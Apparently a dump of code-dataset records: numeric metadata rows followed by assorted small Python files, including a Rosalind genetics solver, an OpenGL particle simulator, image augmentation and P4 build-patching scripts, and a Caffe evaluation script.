| 80
| 37.828571
| 0.863718
| 0.003021
| 0
| 0
| 0
| 0
| 0.006829
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.178571
| 0
| 0.821429
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
5f94b482c019a016c621810412b2112d18748236
| 958
|
py
|
Python
|
Rosalind/iprb.py
|
yuriyshapovalov/Prototypes
|
1fc4af4434440a8f59a4bcb486e79fd53d199a7d
|
[
"Apache-2.0"
] | null | null | null |
Rosalind/iprb.py
|
yuriyshapovalov/Prototypes
|
1fc4af4434440a8f59a4bcb486e79fd53d199a7d
|
[
"Apache-2.0"
] | 1
|
2015-03-25T22:35:52.000Z
|
2015-03-25T22:35:52.000Z
|
Rosalind/iprb.py
|
yuriyshapovalov/Prototypes
|
1fc4af4434440a8f59a4bcb486e79fd53d199a7d
|
[
"Apache-2.0"
] | null | null | null |
# Mendel's First Law
# http://rosalind.info/problems/iprb/
import sys
import unittest
class iprb:
def main(self, hom_dom, het, hom_rec):
total = hom_dom + het + hom_rec
p_hom_dom = hom_dom / total
p_het = het / total
p_hom_rec = hom_rec / total
prob = 1
prob -= p_hom_rec * ((hom_rec-1)/(total-1))
prob -= 2 * p_hom_rec * (het / (total - 1) * 0.5)
prob -= p_het * ((het - 1) / (total-1)) * 0.25
return prob
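# Worked example for the sample input hom_dom=2, het=2, hom_rec=2:
# total = 6, and the probability of a dominant-phenotype offspring is
#   1 - (2/6)*(1/5)          (both parents homozygous recessive)
#     - 2*(2/6)*(2/5)*0.5    (one homozygous recessive, one heterozygous parent)
#     - (2/6)*(1/5)*0.25     (both parents heterozygous)
#   = 1 - 0.06667 - 0.13333 - 0.01667 = 0.78333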
class Test(unittest.TestCase):
def setUp(self):
self.hom_dom = 2
self.het = 2
self.hom_rec = 2
self.result = 0.78333
def test_mendel_first_law(self):
self.assertAlmostEqual(
self.result,
iprb().main(self.hom_dom, self.het, self.hom_rec),
places=5)
if __name__ == '__main__':
hom_dom = int(sys.argv[1])
het = int(sys.argv[2])
hom_rec = int(sys.argv[3])
if hom_dom == 0 or het == 0 or hom_rec == 0:
raise Exception("ERROR: Incorrect parameters")
result = iprb().main(hom_dom, het, hom_rec)
print(result)
| 23.365854
| 51
| 0.654489
| 166
| 958
| 3.548193
| 0.289157
| 0.112054
| 0.067912
| 0.081494
| 0.224109
| 0.078098
| 0.078098
| 0
| 0
| 0
| 0
| 0.036269
| 0.194154
| 958
| 41
| 52
| 23.365854
| 0.726684
| 0.056367
| 0
| 0.0625
| 0
| 0
| 0.038803
| 0
| 0
| 0
| 0
| 0
| 0.03125
| 1
| 0.09375
| false
| 0
| 0.0625
| 0
| 0.25
| 0.03125
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
5f96125b242a38cf3339aa9cccbeb3af52c0c4f9
| 3,679
|
py
|
Python
|
boltzmann.py
|
jkotrc/2D-Elastic-Gas
|
ee7632518adb03076a684dae48f0fb6f8c44efa3
|
[
"Unlicense"
] | null | null | null |
boltzmann.py
|
jkotrc/2D-Elastic-Gas
|
ee7632518adb03076a684dae48f0fb6f8c44efa3
|
[
"Unlicense"
] | null | null | null |
boltzmann.py
|
jkotrc/2D-Elastic-Gas
|
ee7632518adb03076a684dae48f0fb6f8c44efa3
|
[
"Unlicense"
] | null | null | null |
#MAIN method and graphics
try:
from OpenGL.GL import *
from OpenGL import GLU
import OpenGL.GL.shaders
except:
print("OpenGL wrapper for python not found")
import glfw
import numpy as np
from computation import Computation
class Graphics:
def __init__(self,width,height, computation):
if not glfw.init():
print("GLFW Failed to initialize!")
self.window = glfw.create_window(width, height, "Boltzmann", None, None);
glfw.make_context_current(self.window)
self.windowsizechanged=False
glfw.set_window_size_callback(self.window, self.resizewindow)
self.program = self.loadShaders("vertex.glsl", "fragment.glsl")
glUseProgram(self.program)
glUniform1i(glGetUniformLocation(self.program, "WIDTH"), width)
glUniform1i(glGetUniformLocation(self.program, "HEIGHT"), height)
self.width=width
self.height=height
self.comp = computation  # use the constructor argument, not the module-level global
self.points = np.array(self.comp.pos.reshape(-1,order='F'), dtype=np.float32)
self.graphicsinit()
def resizewindow(self,w,h,a):
self.windowsizechanged=True
def graphicsinit(self):
VBO = glGenBuffers(1)
glBindBuffer(GL_ARRAY_BUFFER, VBO)
glBufferData(GL_ARRAY_BUFFER, self.points.itemsize * self.points.size, self.points, GL_STATIC_DRAW)
position = glGetAttribLocation(self.program, "position")
glVertexAttribPointer(position, 2, GL_FLOAT, GL_FALSE, 0, None)
glEnableVertexAttribArray(position)
glClearColor(0.3, 0.3, 0.3, 1.0)
glEnable(GL_POINT_SMOOTH)
glPointSize(self.comp.size/2)
def render(self):
for i in range (0, self.comp.frameskip):
self.comp.cudastep();
self.points = self.comp.pos.reshape(-1,order='F')
glClear(GL_COLOR_BUFFER_BIT)
glUseProgram(self.program)
glBufferData(GL_ARRAY_BUFFER, self.points.itemsize * self.points.size, self.points, GL_STATIC_DRAW)
glDrawArrays(GL_POINTS, 0, int(self.points.size / 2))
glfw.swap_buffers(self.window)
def mainloop(self):
while not glfw.window_should_close(self.window):
glfw.poll_events()
if self.windowsizechanged == True:
self.width,self.height = glfw.get_framebuffer_size(self.window);
glUseProgram(self.program)
glUniform1i(glGetUniformLocation(self.program, "WIDTH"), self.width)
glUniform1i(glGetUniformLocation(self.program, "HEIGHT"), self.height)
self.windowsizechanged=False
self.render()
glfw.terminate()
def loadShaders(self, vertpath, fragpath):
vertexshader=glCreateShader(GL_VERTEX_SHADER)
fragmentshader=glCreateShader(GL_FRAGMENT_SHADER)
fragfile = open(fragpath, "r")
vertfile = open(vertpath, "r")
fragsource = fragfile.read()
fragfile.close()
vertsource = vertfile.read()
vertfile.close()
shader = OpenGL.GL.shaders.compileProgram(OpenGL.GL.shaders.compileShader(vertsource, GL_VERTEX_SHADER),
OpenGL.GL.shaders.compileShader(fragsource, GL_FRAGMENT_SHADER))
return shader
if __name__ == "__main__":
#A good configuration: 80x80 balls, space 24, width=height=1000, size=8, speedrange=20, frameskip=3, epsilon=0.01, blocksize=512
comp=Computation(width=1000, height=1000, space=20, xballs=100, yballs=100, speedrange=20,size=4,frameskip=1,epsilon=0.01,blocksize=512)
g=Graphics(1000, 1000,comp)
g.mainloop();
| 44.325301
| 141
| 0.651264
| 419
| 3,679
| 5.599045
| 0.353222
| 0.042199
| 0.025575
| 0.071611
| 0.212276
| 0.193521
| 0.148338
| 0.127025
| 0.067349
| 0.067349
| 0
| 0.027628
| 0.242457
| 3,679
| 83
| 142
| 44.325301
| 0.814137
| 0.041044
| 0
| 0.094595
| 0
| 0
| 0.039478
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.081081
| false
| 0
| 0.081081
| 0
| 0.189189
| 0.027027
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
5f9861c2730925ff3619b6059676dc2a261cbae6
| 827
|
py
|
Python
|
question_bank/lemonade-change/lemonade-change.py
|
yatengLG/leetcode-python
|
5d48aecb578c86d69835368fad3d9cc21961c226
|
[
"Apache-2.0"
] | 9
|
2020-08-12T10:01:00.000Z
|
2022-01-05T04:37:48.000Z
|
question_bank/lemonade-change/lemonade-change.py
|
yatengLG/leetcode-python
|
5d48aecb578c86d69835368fad3d9cc21961c226
|
[
"Apache-2.0"
] | 1
|
2021-02-16T10:19:31.000Z
|
2021-02-16T10:19:31.000Z
|
question_bank/lemonade-change/lemonade-change.py
|
yatengLG/leetcode-python
|
5d48aecb578c86d69835368fad3d9cc21961c226
|
[
"Apache-2.0"
] | 4
|
2020-08-12T10:13:31.000Z
|
2021-11-05T01:26:58.000Z
|
# -*- coding: utf-8 -*-
# @Author : LG
"""
Runtime: 152 ms, faster than 96.83% of all Python3 submissions
Memory usage: 14 MB, less than 12.45% of all Python3 submissions
Approach:
see the comments in the code
"""
from typing import List  # assumed to be pre-imported on LeetCode; added here for completeness
class Solution:
def lemonadeChange(self, bills: List[int]) -> bool:
five = ten = 0  # start with zero 5-dollar and zero 10-dollar bills
for bill in bills:
if bill == 20:  # a 20 can be changed in two ways
if five > 0 and ten > 0:  # one 5 and one 10
five -= 1
ten -= 1
elif five > 2:  # or three 5s
five -= 3
else:  # otherwise change cannot be given
return False
elif bill == 10 and five > 0:  # a 10 can only be changed with one 5
five -= 1
ten += 1
elif bill == 5:  # a 5 needs no change
five += 1
else:
return False
return True
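# Illustrative trace for the classic input bills = [5, 5, 5, 10, 20]:
# after the three 5s: five=3, ten=0; the 10 takes one 5 as change (five=2, ten=1);
# the 20 takes one 10 and one 5 (five=1, ten=0), so the function returns True.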
| 27.566667
| 59
| 0.41717
| 90
| 827
| 3.833333
| 0.644444
| 0.043478
| 0.046377
| 0.052174
| 0.075362
| 0
| 0
| 0
| 0
| 0
| 0
| 0.108747
| 0.488513
| 827
| 30
| 60
| 27.566667
| 0.706856
| 0.246675
| 0
| 0.3
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.05
| false
| 0
| 0
| 0
| 0.25
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
5f9a0e11f9d9a926bf4cc162d77896b7f50869b6
| 4,668
|
py
|
Python
|
utils/augment_data.py
|
caiobarrosv/object-detection-for-grasping
|
2ac2f58700dff73032836ce33d3b98ebf3f29257
|
[
"BSD-3-Clause"
] | null | null | null |
utils/augment_data.py
|
caiobarrosv/object-detection-for-grasping
|
2ac2f58700dff73032836ce33d3b98ebf3f29257
|
[
"BSD-3-Clause"
] | 4
|
2020-07-24T19:31:51.000Z
|
2022-03-12T00:41:28.000Z
|
utils/augment_data.py
|
caiobarrosv/object-detection-for-grasping
|
2ac2f58700dff73032836ce33d3b98ebf3f29257
|
[
"BSD-3-Clause"
] | null | null | null |
from mxnet import nd
import os
import sys
sys.path.append(os.path.abspath(os.path.join(os.path.dirname( __file__ ), '..')))
import utils.common as dataset_commons
import cv2
import numpy as np
import errno  # used in the EEXIST check in __main__
import glob
import pandas as pd
from gluoncv.data.transforms.presets.ssd import SSDDefaultTrainTransform
from matplotlib import pyplot as plt
'''
This code only gives you a tool to visualize
the images pointed to in the csv file and the related bounding boxes using OpenCV
'''
data_common = dataset_commons.get_dataset_files()
# classes_keys = [key for key in data_common['classes']]
def apply_transformation(img_width, img_height, image, label):
if not isinstance(image, nd.NDArray):
image = nd.array(image)
if image.shape[0] == 3:
image = tensor_to_image(image)
image = nd.array(image)
label = np.array(label)
transform = SSDDefaultTrainTransform(img_width, img_height)
image, label = transform(image, label)
return image, label
def tensor_to_image(tensor):
image = tensor.asnumpy()*255
image = image.astype(np.uint8)
image = image.transpose((1, 2, 0)) # Move channel to the last dimension
return image
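# Example of the conversion above: a CHW float tensor of shape (3, 300, 300)
# with values in [0, 1] becomes an HWC uint8 image of shape (300, 300, 3)
# with values in [0, 255], which is the layout OpenCV expects for saving/display.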
def save_image(image, images_path_save, new_images_name):
if not isinstance(image, np.ndarray):
image = tensor_to_image(image)
cv2.imwrite(images_path_save + '{0:04}'.format(new_images_name) + '.jpg', image)
def print_image(image, bbox, label):
if not isinstance(image, np.ndarray):
image = tensor_to_image(image)
image = cv2.cvtColor(image, cv2.COLOR_RGB2BGR) # OpenCV uses BGR order
xmin = int(bbox[0][0])
ymin = int(bbox[0][1])
xmax = int(bbox[0][2])
ymax = int(bbox[0][3])
cv2.rectangle(image, (xmin, ymin), (xmax, ymax), (255, 0, 0), 1)
cv2.putText(image, 'label: ' + str(label), (xmin, ymin-10), cv2.FONT_HERSHEY_SIMPLEX, 0.5, (255, 0, 0))
cv2.imshow('img', image)
a = cv2.waitKey(0)
return a
def load_images_from_csv_and_augment(images_path, csv_path, images_path_save, img_width, img_height):
train_samples = pd.read_csv(csv_path)
csv_list = []
# numbering for the new images. The new images will get new names: 0000.jpg, etc.;
# num_new_images below is used for that
new_images_name = 0
# number of new images generated from the original image
num_new_images = 4
csv_list = []
for i, row in train_samples.iterrows():
# Reading data from the csv file
image_name_with_extension = row['image']
label = row['label']
xmin = int(row['xmin'])
ymin = int(row['ymin'])
xmax = int(row['xmax'])
ymax = int(row['ymax'])
bbox = [[xmin, ymin, xmax, ymax]]
filename = glob.glob(images_path + "/" + image_name_with_extension)[0]
img = cv2.imread(filename)
for i in range(0, num_new_images+1): # +1 to account for the original image
value = ('{0:04}'.format(new_images_name) + '.jpg',
int(bbox[0][0]),
int(bbox[0][1]),
int(bbox[0][2]),
int(bbox[0][3]),
label
)
csv_list.append(value)
cv2.startWindowThread()
# a = print_image(img, bbox, label)
# if a == 27:
# break
# cv2.destroyWindow('img')
print('Saving image: ', '{0:04}'.format(new_images_name), '.jpg')
save_image(img, images_path_save, new_images_name)
img, bbox = apply_transformation(img_width, img_height, img, bbox)
new_images_name += 1
# if a == 27:
# break
column_name = ['image', 'xmin', 'ymin', 'xmax', 'ymax', 'label']
csv_converter = pd.DataFrame(csv_list, columns=column_name)
return csv_converter
if __name__ == "__main__":
source_images_path = data_common['image_folder']
source_csv_path = data_common['csv_path']
# TODO: Set the file save path
images_path_save = 'images_augmented/' # Folder that will contain the resized images
csv_path_save = 'images_augmented/csv/val_dataset.csv'
img_height = 300
img_width = 300
csv_converter = load_images_from_csv_and_augment(source_images_path, source_csv_path, images_path_save, img_width, img_height)
if not os.path.exists(images_path_save):
try:
os.makedirs(images_path_save + 'csv')
except OSError as e:
if e.errno != errno.EEXIST:
raise
csv_converter.to_csv(csv_path_save, index=None)
print('Successfully converted to a new csv file.')
| 33.826087
| 130
| 0.633248
| 647
| 4,668
| 4.357032
| 0.293663
| 0.042568
| 0.03973
| 0.030153
| 0.202909
| 0.179142
| 0.090458
| 0.063852
| 0.063852
| 0.036893
| 0
| 0.024083
| 0.252785
| 4,668
| 137
| 131
| 34.072993
| 0.784117
| 0.11611
| 0
| 0.096774
| 0
| 0
| 0.058838
| 0.009052
| 0
| 0
| 0
| 0.007299
| 0
| 1
| 0.053763
| false
| 0
| 0.107527
| 0
| 0.204301
| 0.032258
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
5f9c3b49af1837552a765743d83f19677ef7b0fe
| 3,476
|
py
|
Python
|
targets/simple_router/flow_radar_bm/change_bm.py
|
tsihang-zz/FlowRadar-P4
|
1b4f92b83257ba8f34475c098bce8b84daa35b7c
|
[
"Apache-2.0"
] | 15
|
2018-08-21T10:49:38.000Z
|
2021-06-23T14:33:32.000Z
|
targets/simple_router/flow_radar_bm/change_bm.py
|
harvard-cns/FlowRadar-P4
|
1b4f92b83257ba8f34475c098bce8b84daa35b7c
|
[
"Apache-2.0"
] | 1
|
2017-10-16T07:49:06.000Z
|
2017-10-16T13:45:36.000Z
|
targets/simple_router/flow_radar_bm/change_bm.py
|
USC-NSL/FlowRadar-P4
|
1b4f92b83257ba8f34475c098bce8b84daa35b7c
|
[
"Apache-2.0"
] | 6
|
2016-07-26T15:47:46.000Z
|
2018-03-23T01:50:06.000Z
|
import re
import os
def changed(lines, token):
for line in lines:
if line.find(token) != -1:
return True
return False
# copy required files
def copy_files():
os.system("cp flow_radar.h ../build/bm/src")
# change actions.c to add flow_radar lock
def change_actions_c():
actions_c = open("../build/bm/src/actions.c","r")
lines = actions_c.readlines()
actions_c.close()
if changed(lines, '#include "flow_radar.h"'):
return
actions_c = open("../build/bm/src/actions.c","w")
lock_flag = 0
include_flag = 1
for line in lines:
if lock_flag == 1:
m = re.search("^}$", line)
if m != None:
actions_c.write(" unlock_flow_radar();\n")
lock_flag = 0
actions_c.write(line)
if include_flag == 1:
m = re.search("^\*/", line)
if m != None:
actions_c.write('#include "flow_radar.h"\n')
include_flag = 0
if line.find("void action_update_flow_radar") != -1:
actions_c.write(" lock_flow_radar();\n")
lock_flag = 1
actions_c.close()
# change p4_pd_rpc_server.ipp
def change_p4_pd_rpc_server_ipp():
file = open("../build/bm/src/p4_pd_rpc_server.ipp","r")
lines = file.readlines()
file.close()
if changed(lines, '#include "flow_radar.h"'):
return
file = open("../build/bm/src/p4_pd_rpc_server.ipp","w")
key_reg = ["flow_xor_srcip","flow_xor_dstip", "flow_xor_srcport", "flow_xor_dstport", "flow_xor_prot", "flow_count", "packet_count", "flow_filter"]
size = {}
field = ""
for line in lines:
for key in key_reg:
if line.find("void register_read_whole_%s"%key) != -1:
field = key
if field != "":
m = re.search("int8_t ret\[(.*)\];", line)
if m != None:
size[field] = m.group(1)
field = ""
total_size = "(%s)"%size[key_reg[0]]
for key in key_reg[1:]:
total_size += " + (%s)"%size[key]
file.write('extern "C" {\n')
file.write('#include "flow_radar.h"\n')
file.write('}\n')
for line in lines:
file.write(line)
if line.find("// REGISTERS") != -1:
file.write(" void dump_flow_radar(std::vector<int8_t> & _return, const SessionHandle_t sess_hdl, const DevTarget_t& dev_tgt) {\n")
file.write(" p4_pd_dev_target_t pd_dev_tgt;\n")
file.write(" pd_dev_tgt.device_id = dev_tgt.dev_id;\n")
file.write(" pd_dev_tgt.dev_pipe_id = dev_tgt.dev_pipe_id;\n")
file.write(" int8_t ret[%s];\n"%total_size)
file.write(" lock_flow_radar();\n")
ret = "ret"
for key in key_reg:
file.write(" p4_pd_simple_router_register_read_whole_%s(sess_hdl, pd_dev_tgt, %s);\n"%(key, ret))
file.write(" p4_pd_simple_router_register_clean_%s(sess_hdl, pd_dev_tgt);\n"%(key))
ret += " + (%s)"%size[key]
file.write(" unlock_flow_radar();\n")
file.write(" _return.resize(%s);\n"%total_size)
file.write(" for (int i = 0; i < _return.size(); i++)\n")
file.write(" _return[i] = ret[i];\n")
file.write(" }\n")
file.close()
def change_p4_pd_rpc_thrift():
file = open("../build/bm/thrift/p4_pd_rpc.thrift","r")
lines = file.readlines()
file.close()
if changed(lines, "list<byte> dump_flow_radar"):
return
file = open("../build/bm/thrift/p4_pd_rpc.thrift","w")
for line in lines:
file.write(line)
if line.find("# registers") != -1:
file.write(" list<byte> dump_flow_radar(1:res.SessionHandle_t sess_hdl,\n")
file.write(" 2:res.DevTarget_t dev_tgt);\n")
file.close()
if __name__ == "__main__":
copy_files()
change_actions_c()
change_p4_pd_rpc_server_ipp()
change_p4_pd_rpc_thrift()
| 31.035714
| 148
| 0.649597
| 570
| 3,476
| 3.678947
| 0.187719
| 0.085837
| 0.047687
| 0.033381
| 0.571292
| 0.408202
| 0.285646
| 0.254173
| 0.22556
| 0.122079
| 0
| 0.011431
| 0.169448
| 3,476
| 111
| 149
| 31.315315
| 0.714929
| 0.025029
| 0
| 0.298969
| 0
| 0.010309
| 0.396455
| 0.153028
| 0
| 0
| 0
| 0
| 0
| 1
| 0.051546
| false
| 0
| 0.020619
| 0
| 0.123711
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
5f9c577bd20e78c6c12bbdda22baa4f5a81a595e
| 618
|
py
|
Python
|
Python/Armstrong_Number.py
|
shashwat-agarwal/hacktoberfest-2
|
552a4278ffd671603f8659562427b0f1ac5127a4
|
[
"Apache-2.0"
] | 17
|
2020-10-02T03:28:33.000Z
|
2020-10-24T04:08:30.000Z
|
Python/Armstrong_Number.py
|
shubhamgoel90/hacktoberfest
|
e7b1aa18485c4a080b2568910f82e98a5feb6f37
|
[
"Apache-2.0"
] | 22
|
2020-10-01T20:00:56.000Z
|
2020-10-31T01:56:10.000Z
|
Python/Armstrong_Number.py
|
shubhamgoel90/hacktoberfest
|
e7b1aa18485c4a080b2568910f82e98a5feb6f37
|
[
"Apache-2.0"
] | 139
|
2020-10-01T19:51:40.000Z
|
2020-11-02T19:58:19.000Z
|
#Program to check whether the number is an Armstrong number or not
#Ask the user to enter the number
number=int(input("Enter the number you want to check armstrong: "))
#Calculate the number of digits in the entered number.
order=len(str(number))
#Initialise sum to 0
sum=0
temp=number
while temp>0:
num=temp%10
sum+=num**order
temp//=10
if (number==sum):
print("The number you have entered is an Armstrong number.")
else:
print("The number you have entered is not an Armstrong number.")
#OUTPUT:
#Enter the number you want to check armstrong: 1634
#The number you have entered is an Armstrong number.
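#A reusable form of the same check (illustrative sketch only; the is_armstrong helper is not part of the original script):
def is_armstrong(n):
    digits = str(n)
    return n == sum(int(d) ** len(digits) for d in digits)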
| 21.310345
| 68
| 0.723301
| 103
| 618
| 4.339806
| 0.368932
| 0.14094
| 0.134228
| 0.127517
| 0.431767
| 0.431767
| 0.431767
| 0.353468
| 0.187919
| 0
| 0
| 0.022
| 0.190939
| 618
| 28
| 69
| 22.071429
| 0.872
| 0.425566
| 0
| 0
| 0
| 0
| 0.439655
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0.166667
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
5f9df6e37fc71858adef3ee969afe3699916d4a6
| 2,669
|
py
|
Python
|
plugins/DonorlessOperation/__init__.py
|
j-h-m/Media-Journaling-Tool
|
4ab6961e2768dc002c9bbad182f83188631f01bd
|
[
"BSD-3-Clause"
] | null | null | null |
plugins/DonorlessOperation/__init__.py
|
j-h-m/Media-Journaling-Tool
|
4ab6961e2768dc002c9bbad182f83188631f01bd
|
[
"BSD-3-Clause"
] | null | null | null |
plugins/DonorlessOperation/__init__.py
|
j-h-m/Media-Journaling-Tool
|
4ab6961e2768dc002c9bbad182f83188631f01bd
|
[
"BSD-3-Clause"
] | null | null | null |
import logging
from maskgen import video_tools
import random
import maskgen.video_tools
import os
import maskgen
import json
plugin = "DonorPicker"
def transform(img, source, target, **kwargs):
valid = []
possible = []
data = {}
logging.getLogger('maskgen').info(str(kwargs))
for f in os.listdir(kwargs['Directory']):
if os.path.splitext(f)[1] == '.json':
data = json.load(open(os.path.join(kwargs['Directory'],f)))
elif video_tools.get_shape_of_video(os.path.join(kwargs['Directory'], f)) == video_tools.get_shape_of_video(source):
possible.append(os.path.join(kwargs['Directory'],f))
for d in possible:
if os.path.split(d)[1] in data:
valid.append(d)
if len(valid) == 0:
raise ValueError('No donors of correct size available')
donor = valid[0]
if kwargs['Pick Preference'] == 'Random':
donor = valid[random.randint(0,len(valid)-1)]
elif kwargs['Pick Preference'] == 'By Name':
for v in valid:
if os.path.splitext(source)[0] in (os.path.split(v)[1]):
donor = v
elif kwargs['Pick Preference'] =='Specific':
donor = kwargs['Donator']
data = data[os.path.split(donor)[1]]
data['Donator'] = donor
logging.getLogger('maskgen').info("Donor Selected: {}".format(donor))
#shutil.copy((os.path.join(kwargs['Directory'],f)),os.path.join(scenario_model.get, f))
#result, err = callPlugin(kwargs['Plugin'],img,source,target,**kwargs)
#final = {k: v for d in [result, data] for k, v in d.items()} if result is not None else data
logging.getLogger('maskgen').info(str(data))
#os.remove(os.path.join(".", f))
return data,None
def operation():
return {'name': 'SelectRegion',
'category': 'Select',
'type': 'Selector',
'description': 'Pick a donor and other data from a directory',
'software': 'Maskgen',
'version': maskgen.__version__,
'arguments': {
'Directory': {
'type': 'file',
'defaultvalue': '.',
'description': 'Directory full of possible PRNU choices'
},
'Pick Preference': {
'type': 'list',
'values': ['Random', 'By Name', 'Specific'],
'defaultvalue': 'Random',
'description': 'Select the deciding factor for which video will be selected from the directory'
}
},
'transitions': [
                'video.video',
                'image.image'
]
}
| 38.128571
| 124
| 0.557887
| 307
| 2,669
| 4.801303
| 0.345277
| 0.044776
| 0.040706
| 0.043419
| 0.150611
| 0.150611
| 0
| 0
| 0
| 0
| 0
| 0.004772
| 0.293368
| 2,669
| 70
| 125
| 38.128571
| 0.776776
| 0.104159
| 0
| 0
| 0
| 0
| 0.252931
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.032258
| false
| 0
| 0.112903
| 0.016129
| 0.177419
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
5f9e0f831db1b36f8edc783c6c1bfaa61c116474
| 1,228
|
py
|
Python
|
track_model/eval_avg_scores.py
|
QUVA-Lab/lang-tracker
|
6cb3630471765565b6f2d34a160f0cd51d95a082
|
[
"BSD-2-Clause-FreeBSD"
] | 31
|
2017-09-13T13:40:59.000Z
|
2022-01-25T16:55:19.000Z
|
track_model/eval_avg_scores.py
|
zhenyangli/lang-tracker
|
dddd808a22582573ab0a5e4c3dbf0ba054e42d61
|
[
"BSD-3-Clause"
] | 4
|
2017-09-14T01:56:58.000Z
|
2021-01-28T00:58:58.000Z
|
track_model/eval_avg_scores.py
|
QUVA-Lab/lang-tracker
|
6cb3630471765565b6f2d34a160f0cd51d95a082
|
[
"BSD-2-Clause-FreeBSD"
] | 9
|
2017-09-28T03:22:08.000Z
|
2021-01-19T10:56:44.000Z
|
import caffe
import numpy as np
import os
import sys
import track_model_train as track_model
import train_config
max_iter = 1000
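# Run the scores network for max_iter forward passes and report the mean value of the 'fcn_scores' blob.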
def eval_avg_scores(config):
with open('./track_model/scores.prototxt', 'w') as f:
f.write(str(track_model.generate_scores('', config)))
caffe.set_device(config.gpu_id)
caffe.set_mode_gpu()
# Load pretrained model
scores_net = caffe.Net('./track_model/scores.prototxt',
config.weights,
caffe.TEST)
#import ipdb; ipdb.set_trace()
scores = 0
num_sample = 0
for it in range(max_iter):
scores_net.forward()
scores_val = scores_net.blobs['fcn_scores'].data[...].copy()
scores += scores_val.sum()
num_sample += scores_val.size
# ALOV conv345 -> 0.01196
# OTB50 scores = 72313495.437500, samples = 1936000, avg_score = 37.364085 -> 0.02676
# ILSVRC scores = 66083375.812500, samples = 1936000, avg_score = 34.133975 -> 0.02929
avg_score = scores / num_sample
print('\tscores = %f, samples = %d, avg_score = %f\t'
% (scores, num_sample, avg_score))
if __name__ == '__main__':
config = train_config.Config()
eval_avg_scores(config)
| 29.95122
| 90
| 0.643322
| 165
| 1,228
| 4.521212
| 0.472727
| 0.067024
| 0.034853
| 0.050938
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.093248
| 0.240228
| 1,228
| 40
| 91
| 30.7
| 0.706324
| 0.198697
| 0
| 0
| 0
| 0
| 0.124744
| 0.059305
| 0
| 0
| 0
| 0
| 0
| 1
| 0.035714
| false
| 0
| 0.214286
| 0
| 0.25
| 0.035714
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
5f9e1b47610239b65145f24fa61ab7d89533b94e
| 1,968
|
py
|
Python
|
tests/group_test.py
|
gekkeharry13/api-python
|
b18d1694c19f5f972a126ee9ff3d3971a08815cb
|
[
"Apache-2.0"
] | 1
|
2018-05-31T17:29:30.000Z
|
2018-05-31T17:29:30.000Z
|
tests/group_test.py
|
gekkeharry13/api-python
|
b18d1694c19f5f972a126ee9ff3d3971a08815cb
|
[
"Apache-2.0"
] | 8
|
2015-02-20T16:22:12.000Z
|
2019-04-25T23:57:43.000Z
|
tests/group_test.py
|
gekkeharry13/api-python
|
b18d1694c19f5f972a126ee9ff3d3971a08815cb
|
[
"Apache-2.0"
] | 8
|
2015-02-28T06:56:15.000Z
|
2020-01-02T22:42:09.000Z
|
#
# Copyright (C) 2014 Conjur Inc
#
# Permission is hereby granted, free of charge, to any person obtaining a copy of
# this software and associated documentation files (the "Software"), to deal in
# the Software without restriction, including without limitation the rights to
# use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of
# the Software, and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
